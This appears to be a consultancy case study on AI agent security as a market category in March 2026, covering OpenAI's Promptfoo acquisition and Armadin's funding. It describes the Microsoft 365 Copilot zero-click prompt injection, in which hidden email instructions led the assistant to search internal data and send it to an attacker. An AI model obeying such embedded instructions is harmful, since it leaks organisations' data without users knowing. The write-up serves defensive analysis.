In 48 hours, AI agent security became a category. OpenAI acquired Promptfoo. Kevin Mandia launched Armadin with a record $190 million. Microsoft had already disclosed a zero-click vulnerability in Copilot where a hidden email instruction could exfiltrate enterprise data without anyone clicking anything. The attack surface shifted from model safety to agent security — and the defenses don’t exist yet.
On March 9, 2026, OpenAI announced its acquisition of Promptfoo, an AI security startup whose tools are used by more than 25% of Fortune 500 companies. The same day, OpenAI launched Codex Security for agent code vulnerability scanning. Promptfoo’s technology would be integrated into OpenAI Frontier, the enterprise platform for AI agents that launched in February with customers including Uber, State Farm, Intuit, and Thermo Fisher Scientific.[1][2]
The next day, Kevin Mandia — the founder of Mandiant, which he sold to Google for $5.4 billion — launched Armadin with a record-breaking $189.9 million combined seed and Series A. The round was led by Accel, with participation from GV (Google Ventures), Kleiner Perkins, Menlo Ventures, and In-Q-Tel, the CIA’s venture arm. Armadin builds autonomous AI agents that simulate real-world attacks at machine speed. Mandia had hired 60 employees in six months and was already working with Fortune 100 companies.[3][4]
These weren’t isolated moves. They were responses to a threat that had already been demonstrated. In June 2025, Microsoft disclosed a zero-click prompt injection vulnerability in Microsoft 365 Copilot. Researchers embedded instructions inside an email. Without the user clicking anything, the AI assistant executed the hidden commands while analyzing the message, searched internal organizational data, and transmitted it to an attacker’s server. Simply receiving an email was enough to trigger exploitation.[5]
This is the inflection point. In 2025, AI security meant model safety — RLHF alignment, output filters, guardrails. In 2026, AI agents call tools, access databases, send emails, execute code, and interact with enterprise systems. The attack surface is no longer the model. It’s everything the model can reach.
“When you have AI on offense, what you are going to get is a technology that can think, can learn, can adapt. Attackers will complete operations in minutes that used to take days.”
— Kevin Mandia, CEO, Armadin; Founder, Mandiant[3]Internal testing of Microsoft 365 Copilot reveals that hidden instructions embedded in an email can trigger the AI assistant to search internal data and transmit it to an attacker — without the user clicking anything. The “AI zero-click attack” demonstrates that enterprise AI agents with system access create a categorically new attack surface.[5]
D5 Quality — Proof of ConceptKevin Mandia, four years after selling Mandiant to Google, starts Armadin with co-founders from Google Cloud Security and Mandiant. Initial $24M seed. Begins hiring offensive security engineers and building autonomous red-team AI agents.[4]
D2 Talent SignalEnterprise platform for building and operating “AI coworkers” that integrate with internal corporate systems. Customers include Uber, State Farm, Intuit, Thermo Fisher Scientific. The platform that needs security is now live.[2]
D6 OperationalOpenAI announces Promptfoo acquisition (terms undisclosed, $86M last valuation). Technology integrating into Frontier for automated red-teaming, prompt injection detection, jailbreak identification, data leak prevention, tool misuse detection, and compliance monitoring. Same day: Codex Security launches for agent code vulnerability scanning.[1][7]
D5 → D1 → D6Mandia’s new startup announces the largest-ever combined seed and Series A for a cybersecurity company. Accel leads; GV, Kleiner Perkins, Menlo Ventures, In-Q-Tel (CIA) participate. 60+ employees, Fortune 100 customers, autonomous AI agents that simulate nation-state-level attacks.[3][4]
D3 → D5 → D4Palo Alto Networks founder Nir Zuk launches Cylake. JetStream raises $34M seed for AI security. Fig Security launches with $38M. Robust Intelligence and HiddenLayer raised significant rounds for third-party AI security platforms. The competitive field crystallizes in a single month.[8]
D3 Category FormationThe shift from model security to agent security is categorical, not incremental. It changes what “AI risk” means in enterprise deployments.
The zero-click Copilot vulnerability is the proof case. An AI assistant with access to an enterprise’s email, documents, and databases can be weaponized by simply sending it a message with hidden instructions. The LLM cannot distinguish between commands and data — a fundamental architectural limitation that the UK’s National Cyber Security Centre has warned is inherently difficult to prevent.[5]
This is why both sides of the market moved simultaneously. OpenAI acquired Promptfoo because Frontier’s AI agents create the attack surface that Promptfoo’s tools test. Mandia launched Armadin because autonomous AI attackers demand autonomous AI defenders. The security stack for AI agents doesn’t exist yet — and both builders and defenders know it.
“In a world of machine-speed attacks, defense must become autonomous. You cannot have a human in the loop for every defense decision and expect to win.”
— Kevin Mandia, CEO, Armadin[4]The cascade originates in D5 (Quality) — the attack surface IS the quality dimension. AI agents that access enterprise systems create vulnerabilities that didn’t exist before. The cascade flows through all six dimensions because agent security touches every aspect of enterprise operations.
| Dimension | Evidence |
|---|---|
| Quality (D5)Origin · 72 | Zero-click Copilot vulnerability: hidden email instructions exfiltrate data without user interaction. LLMs cannot distinguish commands from data (UK NCSC). Promptfoo generates thousands of simulated attacks per test — prompt injection, jailbreaks, data exfiltration, unauthorized tool invocation, policy violations. The attack surface of AI agents is categorically wider than traditional software. Every tool an agent can call is a vector.[5][1] |
| Regulatory (D4)L1 · 65 | UK NCSC warned prompt injection attacks are inherently difficult to prevent. No regulatory framework for AI agent security exists. Enterprise governance and compliance are becoming procurement gates — vendors without native governance capabilities face longer sales cycles. In-Q-Tel (CIA venture arm) investing in Armadin signals national security dimension.[5][7] |
| Customer (D1)L1 · 62 | 25% of Fortune 500 using Promptfoo. Frontier customers: Uber, State Farm, Intuit, Thermo Fisher. Armadin already with Fortune 100 clients. 350,000 developers and 130,000 monthly active users on Promptfoo open source. Enterprise AI agent deployments are accelerating into production without the security infrastructure that production requires.[1][2] |
| Revenue (D3)L1 · 60 | $189.9M record seed+Series A for Armadin. Promptfoo valued at $86M after $22.7M total funding. JetStream: $34M seed. Fig Security: $38M launch. Cylake launched by Palo Alto Networks founder. Agent security is crystallizing as an investment category — the speed of capital formation signals the market sees this as infrastructure, not feature.[3][8] |
| Operational (D6)L1 · 58 | Promptfoo integrating into CI/CD pipelines. Red-teaming becoming continuous, not periodic. Behavior policy enforcement as code (YAML policies validated in CI/CD). Armadin running parallel attack simulations across web, infrastructure, and internal networks simultaneously. The operational model is shifting from human pen testers to autonomous security agents.[9][4] |
| Employee (D2)L2 · 45 | New security discipline emerging — agent security engineers, AI red-team specialists. Armadin hired 60+ in six months. Co-founders from Mandiant, Google Cloud Security, Google SecOps. But the talent pool is nascent — the skills required (offensive security + LLM architecture + agent orchestration) barely existed a year ago.[3][4] |
Methodology (90): The threat model is exceptionally well-understood. Mandia has 30 years of incident response experience including SolarWinds. Microsoft demonstrated the zero-click vulnerability in controlled testing. Promptfoo’s attack simulation framework is already in production at 25% of the Fortune 500. The offensive security community knows exactly what these vulnerabilities look like. Performance (35): The defensive infrastructure barely exists. Most enterprises have no agent-specific security testing in their CI/CD pipelines. No regulatory framework governs AI agent security. The talent pool for agent security engineering is less than a year old. The gap is wider than the standard 50 because the methodology side is more advanced than usual.
FETCH = Chirp (60.33) × DRIFT (55) × Confidence (0.88) = 2,920 → EXECUTE — HIGH PRIORITY
Confidence at 0.88 reflects primary sources from OpenAI official blog, Bloomberg, CNBC, TechCrunch, SecurityWeek, Security Boulevard, THE ELEC (detailed technical analysis of prompt injection mechanics), and Futurum Group enterprise analysis. DRIFT adjusted to 55 (Methodology 90, Performance 35) based on Mandia’s exceptional domain expertise and the demonstrated zero-click proof of concept.
-- The Zero-Click Moment: 6D At-Risk Cascade
-- AI Agent Security Convergence Q1 2026
FORAGE zero_click_moment
WHERE type = "at-risk"
AND sector = "ai-agent-security"
AND attack_surface_shift = true
AND zero_click_demonstrated = true
ACROSS D5, D1, D3, D6, D4, D2
DEPTH 3
SURFACE cascade_map
DRIFT cascade_map
METHODOLOGY 90 -- Mandia 30yr experience, zero-click demonstrated, 25% F500 adoption
PERFORMANCE 35 -- no regulatory framework, no CI/CD agent security, talent pool <1yr old
FETCH cascade_map
THRESHOLD 1000
ON EXECUTE CHIRP at_risk "AI agent security emerged as a category in 48 hours. Attack surface shifted from models to everything models can reach. Defenses don't exist yet."
SURFACE analysis AS jsonRuntime: @stratiqx/cal-runtime · Spec v1.1: cal.cormorantforaging.dev · DOI: 10.5281/zenodo.18905193
AI agents are designed to access enterprise systems — email, databases, ERP, APIs. That access is the product value. It’s also the attack surface. You cannot remove the vulnerability without removing the capability. This is why agent security is categorically different from model safety — the risk is architecturally inseparable from the function.
OpenAI acquiring Promptfoo (March 9) and Mandia launching Armadin (March 10) within 24 hours is not coincidence — it’s convergence. Both sides of the market (platform vendor and independent security) moved simultaneously because both recognized the same gap. When the builder and the defender agree the defenses don’t exist, the DRIFT is real.
Most cases use the default DRIFT of 50. This case warrants 55 because the methodology side is elevated (Mandia’s 30-year track record, demonstrated zero-click proof of concept) while performance is depressed (no regulatory framework, no CI/CD agent security at most enterprises). The gap between knowing exactly what the threat looks like and having no deployed defense is wider than usual.
The CIA’s venture arm investing in Armadin’s seed round means the US intelligence community assesses AI agent security as a national security gap. This isn’t commercial VC pattern-matching — In-Q-Tel invests where it sees threats to critical infrastructure. Agent security is now a defense priority, not just an enterprise one.
UC-069 maps the security gap. The cases it connects to map what’s being deployed into that gap without protection.
UC-068 The Bedside Manner — health AI agents handling medical records with HIPAA gaps · UC-066 The State Machine — China deploying AI agents at state scale ahead of security frameworks · UC-065 The Treadmill — the compute infrastructure these agents and their attackers both run on · UC-059 The Code Is Dead — AI agents writing code that needs the security testing Promptfoo provides
One conversation. We’ll tell you if the six-dimensional view adds something your current tools miss — or confirm they have it covered.